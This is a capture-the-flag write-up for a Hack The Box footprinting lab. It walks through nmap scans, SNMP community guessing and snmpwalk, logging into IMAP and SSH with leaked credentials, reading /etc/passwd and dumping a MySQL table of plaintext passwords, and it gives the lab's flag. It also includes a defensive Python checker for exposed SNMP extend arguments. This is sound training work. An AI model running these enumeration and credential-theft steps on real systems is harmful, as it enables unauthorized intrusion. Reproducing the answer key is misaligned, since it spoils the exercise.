The Hack The Box (HTB) Footprinting module teaches you how to analyze and footprint a target. Here’s how to derive the solution and capture the flag.
In this last of three Hack The Box footprinting labs, we are given the following instructions.
Enumerate the server carefully and find the username “HTB” and its password. Then, submit HTB’s password as the answer.
The third server is an MX and management server for the internal network. Subsequently, this server has the function of a backup server for the internal accounts in the domain. Accordingly, a user named HTB was also created here, whose credentials we need to access.
Scan the target using nmap
To begin, scan the target using a basic nmap scan. The command nmap -sV -sC 10.129.202.20 -Pn performs a network scan of the host at IP address 10.129.202.20 using several specific options:
-Pn: Disables host discovery (ping scan). By default, Nmap tries to determine if a host is online before scanning it, usually by sending ICMP echo requests or TCP SYN packets. The -Pn option tells Nmap to skip this step and treat the host as if it is up, scanning it directly. This is useful if the host blocks ping requests or if you know it is online and want to avoid being filtered by firewalls that block ping.
-sV: Enables service version detection. Nmap will probe open ports to determine what service is running on each port and, if possible, identify the version of the software providing the service.
-sC: Runs a set of default scripts using the Nmap Scripting Engine (NSE). These scripts are designed to quickly gather additional information about the target, such as checking for common vulnerabilities, retrieving banners, or enumerating users.
sudo nmap -sV -sC 10.129.202.20 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-30 11:10 CDT
Nmap scan report for 10.129.202.20
Host is up (0.068s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
110/tcp open pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA SASL(PLAIN) UIDL TOP USER RESP-CODES PIPELINING AUTH-RESP-CODE STLS
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: ENABLE more ID have post-login capabilities listed STARTTLS IMAP4rev1 Pre-login OK AUTH=PLAINA0001 LOGIN-REFERRALS LITERAL+ IDLE SASL-IR
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_imap-capabilities: ENABLE ID more have capabilities post-login listed IMAP4rev1 Pre-login OK IDLE LOGIN-REFERRALS AUTH=PLAINA0001 LITERAL+ SASL-IR
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: CAPA UIDL SASL(PLAIN) USER RESP-CODES PIPELINING AUTH-RESP-CODE TOP
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.27 seconds
In this scan, we find SSH and multiple email-related ports (110, 143, 993, 995).
Scan UDP using nmap
Next, we scan the UDP ports (-sU) on the target.
nmap -sV --top-port 100 -sU 10.129.202.20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-30 11:13 CDT
Nmap scan report for 10.129.202.20
Host is up (0.074s latency).
Not shown: 98 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
161/udp open snmp net-snmp; net-snmp SNMPv3 server
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 212.00 seconds
There is an open SNMP port that looks interesting.
Scan SNMP using onesixtyone
We can examine the service more carefully using the onesixtyone utility.
onesixtyone -c /opt/useful/seclists/Discovery/SNMP/snmp.txt 10.129.202.20
Scanning 1 hosts, 3219 communities
10.129.202.20 [backup] Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64
Scan [backup] using snmpwalk
We find a [backup] community string that we can use to query the OIDs with snmpwalk.
snmpwalk -v2c -c backup 10.129.202.20
iso.3.6.1.2.1.1.1.0 = STRING: "Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (137065) 0:22:50.65
iso.3.6.1.2.1.1.4.0 = STRING: "Admin <tech@inlanefreight.htb>"
iso.3.6.1.2.1.1.5.0 = STRING: "NIXHARD"
iso.3.6.1.2.1.1.6.0 = STRING: "Inlanefreight"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (137946) 0:22:59.46
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 06 1E 10 1C 25 00 2B 00 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.4.0-90-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro ipv6.disable=1 maybe-ubiquity
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 142
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.1.1.0 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.2.6.66.65.67.75.85.80 = STRING: "/opt/tom-recovery.sh"
iso.3.6.1.2.1.25.1.7.1.2.1.3.6.66.65.67.75.85.80 = STRING: "tom NMds732Js2761"
iso.3.6.1.2.1.25.1.7.1.2.1.4.6.66.65.67.75.85.80 = ""
iso.3.6.1.2.1.25.1.7.1.2.1.5.6.66.65.67.75.85.80 = INTEGER: 5
iso.3.6.1.2.1.25.1.7.1.2.1.6.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.7.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.20.6.66.65.67.75.85.80 = INTEGER: 4
iso.3.6.1.2.1.25.1.7.1.2.1.21.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.3.1.1.6.66.65.67.75.85.80 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
iso.3.6.1.2.1.25.1.7.1.3.1.2.6.66.65.67.75.85.80 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:
Authentication token manipulation error
chpasswd: (line 1, user tom) password not changed
Changing password for tom."
iso.3.6.1.2.1.25.1.7.1.3.1.3.6.66.65.67.75.85.80 = INTEGER: 4
iso.3.6.1.2.1.25.1.7.1.3.1.4.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.1 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.2 = STRING: "Authentication token manipulation error"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.3 = STRING: "chpasswd: (line 1, user tom) password not changed"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.4 = STRING: "Changing password for tom."
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.4 = No more variables left in this MIB View (It is past the end of the MIB tree)
We see what looks like attempts being made to change a password. Note this line in particular:
STRING: "tom NMds732Js2761"
It looks like the username “tom” and a password of “NMds732Js2761”.
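The rows under iso.3.6.1.2.1.25.1.7.1 have the shape of net-snmp's extend tables, which is why a script path and its arguments are readable by anyone holding the community string. The following added example (not part of the original walkthrough) parses snmpwalk output, decodes the length-prefixed index (6.66.65.67.75.85.80 is "BACKUP"), and reports extend entries whose arguments are exposed. The column names come from NET-SNMP-EXTEND-MIB; mapping them onto this subtree is an assumption based on the layout, and the sample argument value is redacted.

```python
import re

# Assumption: the subtree this agent exposes follows the NET-SNMP-EXTEND-MIB
# table layout (<table>.<entry>.<column>.<index>), relocated to this base OID.
EXTEND_BASE = "iso.3.6.1.2.1.25.1.7.1"
COLUMNS = {
    ("2", "2"): "nsExtendCommand",
    ("2", "3"): "nsExtendArgs",
    ("2", "4"): "nsExtendInput",
    ("3", "1"): "nsExtendOutput1Line",
    ("3", "2"): "nsExtendOutputFull",
    ("4", "2"): "nsExtendOutLine",
}

# Constructed sample: lines taken from the walk above, argument value redacted.
SAMPLE_WALK = '''\
iso.3.6.1.2.1.1.5.0 = STRING: "NIXHARD"
iso.3.6.1.2.1.25.1.7.1.1.0 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.2.6.66.65.67.75.85.80 = STRING: "/opt/tom-recovery.sh"
iso.3.6.1.2.1.25.1.7.1.2.1.3.6.66.65.67.75.85.80 = STRING: "tom <REDACTED>"
iso.3.6.1.2.1.25.1.7.1.2.1.4.6.66.65.67.75.85.80 = ""
iso.3.6.1.2.1.25.1.7.1.2.1.5.6.66.65.67.75.85.80 = INTEGER: 5
iso.3.6.1.2.1.25.1.7.1.3.1.1.6.66.65.67.75.85.80 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.1 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
'''

LINE_RE = re.compile(r'^(?P<oid>\S+) = (?:(?P<type>[\w-]+): )?(?P<value>.*)$')


def decode_index(subids):
    """Decode a length-prefixed string index, e.g. 6.66.65.67.75.85.80 -> 'BACKUP'.

    Returns (name, remaining sub-identifiers)."""
    length = int(subids[0])
    chars = subids[1:1 + length]
    if len(chars) != length:
        raise ValueError("index shorter than its length prefix")
    return "".join(chr(int(c)) for c in chars), subids[1 + length:]


def parse_extend_rows(walk_text):
    """Return one dict per recognised extend-table cell in snmpwalk output."""
    rows = []
    for line in walk_text.splitlines():
        m = LINE_RE.match(line)
        # Continuation lines of multi-line strings do not match and are skipped.
        if not m or not m["oid"].startswith(EXTEND_BASE + "."):
            continue
        parts = m["oid"][len(EXTEND_BASE) + 1:].split(".")
        if len(parts) < 4 or parts[1] != "1":
            continue  # scalar such as the entry count at .1.0
        column = COLUMNS.get((parts[0], parts[2]))
        if column is None:
            continue  # cache time, status and other non-text columns
        try:
            name, rest = decode_index(parts[3:])
        except (ValueError, IndexError):
            continue
        rows.append({
            "extend": name,
            "column": column,
            "line": rest[0] if rest else None,
            "value": m["value"].strip('"'),
        })
    return rows


def exposed_arguments(rows):
    """Return (extend name, command, args) for extends with readable arguments."""
    by_name = {}
    for r in rows:
        by_name.setdefault(r["extend"], {})[r["column"]] = r["value"]
    return [
        (name, cols.get("nsExtendCommand", ""), cols["nsExtendArgs"])
        for name, cols in sorted(by_name.items())
        if cols.get("nsExtendArgs")
    ]


if __name__ == "__main__":
    for name, command, args in exposed_arguments(parse_extend_rows(SAMPLE_WALK)):
        print(f"extend {name}: {command} exposes arguments {args!r}")
```

Run against a walk of your own agent, any hit means the value should move out of the extend line into a file only the script can read, and the community's view should exclude the subtree.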
Try connecting to the IMAP service using the credentials we found with snmpwalk
We can use OpenSSL to connect to the IMAP service.
openssl s_client -connect 10.129.202.20:imaps
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 CN = NIXHARD
verify error:num=18:self-signed certificate
verify return:1
depth=0 CN = NIXHARD
verify return:1
---
Certificate chain
0 s:CN = NIXHARD
i:CN = NIXHARD
a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
v:NotBefore: Nov 10 01:30:25 2021 GMT; NotAfter: Nov 8 01:30:25 2031 GMT
---
Server certificate
subject=CN = NIXHARD
issuer=CN = NIXHARD
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1283 bytes and written 377 bytes
Verification error: self-signed certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 18 (self-signed certificate)
---
* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot (Ubuntu) ready.
Next, we attempt to log in as the “tom” user with the password we discovered via SNMP. Remember to prefix each IMAP command with an index number, which IMAP calls a tag (e.g., 1 LOGIN tom password). Then, list the mailboxes (1 LIST "" *).
1 LOGIN tom NMds732Js2761
1 OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SNIPPET=FUZZY PREVIEW=FUZZY LITERAL+ NOTIFY SPECIAL-USE] Logged in
1 LIST "" *
* LIST (\HasNoChildren) "." Notes
* LIST (\HasNoChildren) "." Meetings
* LIST (\HasNoChildren \UnMarked) "." Important
* LIST (\HasNoChildren) "." INBOX
1 OK List completed (0.016 + 0.000 + 0.015 secs).
We see a mailbox called INBOX. Select the inbox (1 SELECT INBOX) and we see there is one item in the box. Fetch the item (1 FETCH 1 BODY[]). It is an email from tech to Tom that includes a private SSH key.
1 SELECT INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1636509064] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
1 OK [READ-WRITE] Select completed (0.005 + 0.000 + 0.004 secs).
1 FETCH 1 BODY
* 1 FETCH (BODY ("text" "plain" ("charset" "us-ascii") NIL NIL "7bit" 3430 49))
1 OK Fetch completed (0.493 + 0.000 + 0.492 secs).
1 FETCH 1 BODY[]
* 1 FETCH (BODY[] {3661}
HELO dev.inlanefreight.htb
MAIL FROM:<tech@dev.inlanefreight.htb>
RCPT TO:<bob@inlanefreight.htb>
DATA
From: [Admin] <tech@inlanefreight.htb>
To: <tom@inlanefreight.htb>
Date: Wed, 10 Nov 2010 14:21:26 +0200
Subject: KEY
-----BEGIN OPENSSH PRIVATE KEY-----
[key material omitted]
-----END OPENSSH PRIVATE KEY-----
)
1 OK Fetch completed (0.001 + 0.000 secs).
Copy the SSH key found in the email
Copy the SSH key we found in the email to a file (e.g., id_rsa_1).
nano id_rsa_1
Change the permissions of the private key file
As is always required when using a private key, chmod the file to 600: ssh refuses to use a private key file that other users can read.
chmod 600 id_rsa_1
Use the newfound SSH key to connect
Use the private key you saved in id_rsa_1 to connect using SSH.
ssh -i id_rsa_1 tom@10.129.202.20
The authenticity of host '10.129.202.20 (10.129.202.20)' can't be established.
ED25519 key fingerprint is SHA256:AtNYHXCA7dVpi58LB+uuPe9xvc2lJwA6y7q82kZoBNM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.202.20' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 30 Jun 2025 04:46:35 PM UTC
System load: 0.0 Processes: 165
Usage of /: 70.0% of 5.40GB Users logged in: 0
Memory usage: 29% IPv4 address for ens192: 10.129.202.20
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Nov 10 02:51:52 2021 from 10.10.14.20
We find that the key worked. We are now on the system.
Check users on the host
cat the password file to see what users exist on the system.
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:ubuntu:/home/ubuntu:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
cry0l1t3:x:1001:1001:,,,:/home/cry0l1t3:/bin/bash
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
tom:x:1002:1002:,,,:/home/tom:/bin/bash
dovecot:x:113:120:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
dovenull:x:115:121:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin
Debian-snmp:x:116:122::/var/lib/snmp:/bin/false
We find mail, web (www-data), and Tom’s account. We also see a MySQL user indicating there’s a database on this server.
Log in to MySQL with the credentials we found earlier
Try logging in to MySQL using the tom username and the password we found earlier (NMds732Js2761, which seems to be reused everywhere).
mysql -u tom -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 8.0.27-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2021, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| users |
+--------------------+
5 rows in set (0.01 sec)
mysql>
We see a users database.
Examine the users database
Change to the users database and show the tables. There is a users table within the users database.
mysql> use users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables
-> ;
+-----------------+
| Tables_in_users |
+-----------------+
| users |
+-----------------+
1 row in set (0.00 sec)
Show the columns from the users table. It’s a user table with a username and password column. Query both columns from the database.
mysql> show columns from users
-> ;
+----------+-------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+----------+-------------+------+-----+---------+-------+
| id | int | YES | | NULL | |
| username | varchar(50) | YES | | NULL | |
| password | varchar(50) | YES | | NULL | |
+----------+-------------+------+-----+---------+-------+
3 rows in set (0.01 sec)
mysql> select username, password from users;
+-------------------+------------------------------+
| username | password |
+-------------------+------------------------------+
| ppavlata0 | 6znAfvTbB2 |
| ktofanini1 | TP2NxFD62e |
| rallwell2 | t1t7WaqvEfv |
| efernier3 | ZRYOBO9PI |
| fpoon4 | 5Spyx2Jb |
| jgurnell5 | LMCnWKD |
| aminter6 | ngCyGg3 |
| dwattinham7 | H2bpGC5 |
| ddumphreys8 | eGek5Q8 |
| etookey9 | kXBd88ZX |
| mlindbacka | H9uTnIvli92 |
| awebbeb | RALeM2IfuwA |
| tswannellc | oHdZWwO9 |
| slydiattd | r3wRgn |
| cparslowe | nVdJAHr |
| sheartfieldf | ofTf0hE7OL |
| aalvesg | diTzuE |
| eshilstoneh | NVSRa5L8Lx |
| eludovicoi | w2uUtLGYkDi |
| rcoppenhallj | 8T1AO16C4pm |
| rfuxmank | oOVWyPyo |
| tmoraledal | CDNj7KH |
| vdurdanm | KBM4BTldF |
| mlandisn | oCOZcC |
| gfancutto | RNHlBaFKLLt |
| dfigliovannip | Cf7T9osx |
| ngoedeq | eDfTnH |
| abalhamr | Qc2Tia0zM |
| tmartys | VC65xd6o |
| sallewellt | Y5VSv1rm |
| mjoveyu | ej3amn |
| mgoodlifev | lCbzNIw7B90 |
| gmargeramw | hbVF2G |
| leberlex | Nj6UCAQ |
| mtrimbyy | jfNkfg5ZW |
| mkimmz | pZZepTCVlkN |
| mflaunier10 | 9TZ8mfLA |
| vgomes11 | qM6nHjMtD |
| sbrimham12 | FoXudHc4Ocr |
| cbendle13 | zFUIGVBx |
| ralgeo14 | YTB8IXOk |
| rsandyfirth15 | vARbkPRQv |
| bcarlesi16 | m4H6q6pH |
| cfrude17 | Za8UHiSe25N |
| rjullian18 | 6QyxSjg |
| bgissing19 | fjes6w8Ovw0 |
| limore1a | gVzkv8syQ |
| scarlisle1b | sR9rPBL5 |
| hamoss1c | tbmK9XBhn57j |
| cradmore1d | TQkfKxEl7 |
| apetican1e | ABibihOvMOu |
| eweber1f | sEDynNORm7b |
| nbockmaster1g | M1tVaH |
| cianne1h | Vc8agpinq |
| khatchette1i | xXOnQFOsF0I |
| tkroger1j | uisR7g1eVEU |
| sgladtbach1k | iIVQ4l |
| bmockford1l | BBsZPmwk0r |
| balabone1m | aTUbGm0 |
| jmantripp1n | DTVAdvbadbA2 |
| tchown1o | dCulXiBc |
| vconradsen1p | v5E0sgqzo |
| hfudge1q | cSODbEMtCm |
| syaneev1r | ilXo6tKGHY7 |
| btheyer1s | LxNk1t |
| fcahn1t | oSBmcLx |
| edurrington1u | LMomwfQkq3 |
| kcounter1v | 1zUE6RHS |
| bqueripel1w | 0A2OfeQPnhd |
| mnacci1x | lNyUiY8U4t |
| dcabell1y | W6Q7R3zsxB |
| ctaleworth1z | d3JWwTj |
| mmcgrah20 | yPxlvhS |
| jgannaway21 | oGfIrDxkSIo |
| eiacovone22 | 8jKlhgvC |
| rnaughton23 | Gyf6awYCm4 |
| adobbins24 | ashZ0G |
| pwarbeys25 | nSmfKSYW9GL |
| bbrabbins26 | YZWuH6D8Q |
| adandy27 | dF1VPsn |
| mfarrens28 | ucPclA8K9c |
| dhaysar29 | MeGzIGeyKXyw |
| efoot2a | Q2ks5eg |
| tpelosi2b | 8yjhdx |
| binman2c | 3uO3PeL8e |
| krait2d | EFD5FpEtu2 |
| jcrook2e | VFsdmvhDz4O |
| falonso2f | 4ifO54 |
| jmacak2g | KUDAxTXU |
| nnorville2h | WCYa9C1G |
| tlevington2i | If46bHoGr |
| abartak2j | erFX4u0e0 |
| jgoad2k | gunnsPy1pMCd |
| dwadham2l | 89IiRFy0frst |
| hvenditti2m | NS0U18XON |
| gpitchers2n | j7RVE2 |
| aiskowitz2o | 8iVpSQUEXn2K |
| gcars2p | 8i3nsQU9wp |
| bjacke2q | 2PtrA0C |
| fstorton2r | XmjbfR1vK1 |
| pbrinded2s | Jf9uWJ |
| penriques2t | o3kmQ5zHF5Qb |
| awinckworth2u | LEwOydD3nncQ |
| lkinsell2v | kvoIZupHNt |
| wdavisson2w | nk5HVS |
| rrenzini2x | LiCJccRxumYU |
| kdavys2y | ZXpRVEn |
| ravann2z | YLkKN4JzzM |
| hrallings30 | 6wS4x0IeLW |
| sbrackpool31 | lBa8AVaPQg |
| epulham32 | yIV88FM9DM |
| mspeachley33 | JSa9aUv1h |
| vforkan34 | 26Q6gTgsOE8T |
| jprichard35 | sggVPPMfRA3T |
| abisatt36 | GcSlKIuky |
| todocherty37 | BwSfFV3qj |
| njayne38 | D8yr44NNQ |
| gwhyman39 | h0WJ4p2F2x8 |
| lkristoffersson3a | mARndSF |
| lmcallan3b | gmpkAKF |
| kdouble3c | qYtstjmdR |
| sgooding3d | venooIUMMHE |
| lgaffney3e | 1fCwgoaCtz |
| emuriel3f | Wz582Y22 |
| mlamasna3g | MhqsPNMRYwJE |
| omander3h | CuB3JbXJ |
| fropkes3i | jVBeawjIPXS |
| mhawk3j | g0sPpI8 |
| wseres3k | zgsXeR7blA |
| bflaws3l | 0dTvgBkaFYqi |
| ccyson3m | EtCscA |
| afowell3n | cRG0x5 |
| jmolian3o | fCwa9ry |
| gterzo3p | Srv77g |
| ravrahamy3q | dFjfFMEJ |
| amaden3r | n1WAtKT |
| gdeverall3s | 1Vj3bbr |
| ejansema3t | 4MyiArdEVq |
| snormanville3u | l1s9Ao9omd |
| nfinder3v | Rd1POwc3 |
| lrodway3w | UNW82GQfd0q |
| lstening3x | JaSkROwU83UB |
| hemer3y | GlPpKB |
| eblamphin3z | 7Zjz7RvcC9x |
| lwederell40 | eyWsJl |
| nverick41 | Mr1r2H |
| mlawlie42 | XrHEZJbuUd |
| swahlberg43 | 46gOiZ |
| crubinivitz44 | FLlYii1mQz84 |
| HTB | cr3n4o7rzse7rzhnckhssncif7ds |
| wdoswell46 | FYXMuelBVcS |
| ccollingwood47 | LM6SU2N3w7KQ |
| nfoux48 | N40DfFww |
| gboyat49 | W1LDy7 |
| csuddick4a | UIGXl3lL |
